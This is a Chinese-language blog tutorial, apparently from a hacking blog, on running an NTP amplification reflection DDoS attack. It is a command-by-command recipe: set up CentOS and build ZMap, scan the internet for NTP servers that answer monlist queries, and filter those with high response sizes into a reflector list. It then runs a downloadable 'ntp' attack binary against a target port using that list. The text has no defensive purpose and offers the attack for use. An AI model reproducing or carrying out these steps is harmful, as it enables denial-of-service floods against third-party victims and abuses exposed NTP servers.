Loading
0

NTP放大反射攻击扫描列表教程

1.升级所有包,改变软件设置和系统设置,系统版本内核都升级

yum -y update

2.下载rpm包(区分centos6 与centos7 执行不同的命令)

centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm

centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm

3.安装必要的依赖环境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

--------------------------------------------扫描过滤列表-----------------------------------------------

4.安装Zmap

wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz  
cd /root/zmap-1.0.3
cd src/
make
make install

ZMap安装完成,可以运行如下命令测试:

zmap -p 80 -N 10 -B 1M -o -   #很快,程序会输出10个Internet上打开了80端口的主机的IP,你也可以换成22端口23端口试试。具体的用法可以参考ZMap官方文档。

5.开始扫描NTP放大列表

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
如果在扫描时,你与服务器的会话不小心中断。
你可以重新连接服务器。
使用命令screen -r回到会话。
screen是将程序独立运行在后台,直到执行完成。

6.过滤列表

chmod 777 ntpchecker #添加权限

screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #运行检查

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt #过滤列表

软件下载:ntp.rar

--------------------------------------------放大攻击-----------------------------------------------

7.攻击命令

chmod 777 ntp #赋予权限
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100

点此加群

本文由A1d4m's blog(www.ychack.com)提供,文章原创版权所有,转载请注明!